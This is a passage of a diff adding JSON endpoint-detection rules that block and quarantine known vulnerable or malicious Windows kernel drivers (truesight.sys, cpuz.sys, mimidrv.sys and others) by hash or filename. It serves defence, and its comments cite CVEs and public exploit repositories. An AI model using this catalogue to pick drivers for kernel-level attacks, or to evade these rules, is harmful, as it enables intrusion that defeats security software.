"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977090Z", + "creation_date": "2026-03-23T11:45:29.977092Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977097Z", + "rule_level": null, 
+ "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9532a354c24fd256c24534c554bca5a126414eb496dbd3223fe9486418df2ea", + "comment": "HP Hardware Diagnostic's EtdSupp vulnerable driver (aka etdsupp.sys) [https://github.com/alfarom256/HPHardwareDiagnostics-PoC] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "738a5fe3-89b7-5799-8e30-217cc112b6cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613807Z", + "creation_date": "2026-03-23T11:45:29.613808Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613814Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "410f02303292798ab2a8b3e7d253938b466e83071b15e7d3aaa25f4995b27187", + "comment": "Vulnerable Kernel Driver (aka Bs_Def.sys) [https://www.loldrivers.io/drivers/3ac0eda2-a844-4a9d-9cfa-c25a9e05d678/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "739178d9-a60a-5511-aa1d-d4a0f1820332", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819343Z", + "creation_date": "2026-03-23T11:45:30.819344Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819350Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c92df36fa57fd215aef78a016c6cf6bd535bb3472ce4eb07e403535daa96318c", + "comment": "Vulnerable Kernel Driver (aka hwdetectng.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "73a0b036-fede-5775-900e-de25ef5ab872", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829182Z", + "creation_date": "2026-03-23T11:45:31.829186Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829195Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7dc7e4e72bcaa9e7b67f440a2d69b6656b9092ca1a2897fe14905826695432ee", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "73a40aff-4771-5836-9e72-abb7a343aa27", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976119Z", + "creation_date": "2026-03-23T11:45:29.976121Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976126Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "filename", + "value": "systeminformer.sys", + "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "73ad278c-5ee5-5ad1-a7bd-76016804d5d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622191Z", + "creation_date": 
"2026-03-23T11:45:29.622193Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622198Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "362c4f3dadc9c393682664a139d65d80e32caa2a97b6e0361dfd713a73267ecc",
+ "comment": "BioStar Racing GT EVO vulnerable driver (aka BS_RCIO64.sys) [CVE-2021-44852] [https://nephosec.com/biostar-exploit/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73bc7830-8325-5279-b26e-6103889f1b9c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983351Z",
+ "creation_date": "2026-03-23T11:45:29.983353Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983359Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4335f4189240a3bcafa05fab01f0707cc8e3dd7a2998af734c24916d9e37ca8",
+ "comment": "Vulnerable Kernel Driver (aka kbdcap64.sys) [https://www.loldrivers.io/drivers/6a7d882b-3d9d-4334-be5f-2e29c6bf9ff8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73bf3515-24d6-536b-94c9-c8f90fede636",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817160Z",
+ "creation_date": "2026-03-23T11:45:30.817162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817168Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c11dec1571253594d64619d8efc8c0212897be84a75a8646c578e665f58bf5d",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73ca0d88-49b7-5b9b-a3b4-bd8d6309c0b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478600Z",
+ "creation_date": "2026-03-23T11:45:30.478603Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478613Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b5d0849fc567c169176c2002dd358240d75ca0aacfca92c79d252006c6e0444e",
+ "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73cf54bb-309c-5fdc-96b7-a0ff25497176",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456219Z",
+ "creation_date": "2026-03-23T11:45:30.456222Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456231Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a1feb8649a5c0679e1073e6d8a02c8a6ebc5825f02999f16c9459284f1b198b",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73d6b906-a4c7-5d45-bb89-2f8aa6478a14",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474502Z",
+ "creation_date": "2026-03-23T11:45:30.474505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474514Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e43be62587d7c4bb371bc0a1142a87a2a021bd0dcfd6cd107a50837c109e3ba",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73dc7e36-4871-53b0-bd8d-da5f2abe3746",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975467Z",
+ "creation_date": "2026-03-23T11:45:29.975471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b5153404fe836cf93237c50977cdb28a3bbd9663bdf63f5bfa26e65e1d00b3f",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73ddf34d-96d9-5e29-a452-bf1fb213a85d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478830Z",
+ "creation_date": "2026-03-23T11:45:30.478833Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478842Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6165491e8391eac9c0e3b9a2a31e1692a567c16cbfa36d7a88c401ffae1f6c63",
+ "comment": "Vulnerable Kernel Driver (aka asas.sys) [https://www.loldrivers.io/drivers/dbb58de1-a1e5-4c7f-8fe0-4033502b1c63/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73e12948-d6cf-587a-8eb2-0409c5c52eb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140782Z",
+ "creation_date": "2026-03-23T11:45:31.140784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140790Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ef9485e039d30ff71e9894ec4bbe2efce32ca9ecf1bb919dffb5f6cebea00993",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73ecfaf9-84ee-52b1-97ec-bec6a5c8a563",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820617Z",
+ "creation_date": "2026-03-23T11:45:30.820618Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820624Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "64dddd5ac53fe2c9de2b317c09034d1bccaf21d6c03ccfde3518e5aa3623dd66",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74094e0f-5873-58cd-afe2-daa8ac9540a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475379Z",
+ "creation_date": "2026-03-23T11:45:31.475383Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475393Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb1dd60610ec06f02801006be2e9c4274d7ae3e6a3b17d6760f27f470d16d3ac",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "741bafce-1532-5559-96e6-328a42db91ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827017Z",
+ "creation_date": "2026-03-23T11:45:30.827019Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827024Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "27f8831c710ae2471f6c35d2311e690b36acc9d31d466b22ff7ffbfe1ef3ced8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "742a06af-a2f1-5a07-800e-16816dea1c63",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610828Z",
+ "creation_date": "2026-03-23T11:45:29.610830Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610836Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df0dcfb3971829af79629efd036b8e1c6e2127481b3644ccc6e2ddd387489a15",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "742e502b-88e4-5596-9cbd-b6f31ddd363d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156740Z",
+ "creation_date": "2026-03-23T11:45:31.156742Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156748Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "643d283d908f4ac343a878d98b6477cbb6eba4424ca6ad85341e91237d288b06",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7432fa8b-24e3-57c8-a2d1-4d7e41c7415e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822607Z",
+ "creation_date": "2026-03-23T11:45:31.822611Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822619Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b37dbd665e83bb8554b6f46b1246bb8cac9dba98963b319a037cde6495b2ad71",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "744cbc20-393c-5bf0-9d87-ddc23081795b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976010Z",
+ "creation_date": "2026-03-23T11:45:29.976012Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976018Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "01b9a38c08e8a143c2e51768bd6c227367d1502c090033beddec5a89f50ca4cd",
+ "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "744ddd60-3539-5e4f-a94c-3eac1b4afb1d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160891Z",
+ "creation_date": "2026-03-23T11:45:31.160893Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a8a37ef69dbc56da1ffeb5cc8bb7bca2b2472513af7614ce7e562b0f92082540",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "745543b6-1ac7-515f-9cd3-af4350d7eec9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463978Z",
+ "creation_date": "2026-03-23T11:45:30.463981Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463990Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "baf7fbc4743a81eb5e4511023692b2dfdc32ba670ba3e4ed8c09db7a19bd82d3",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
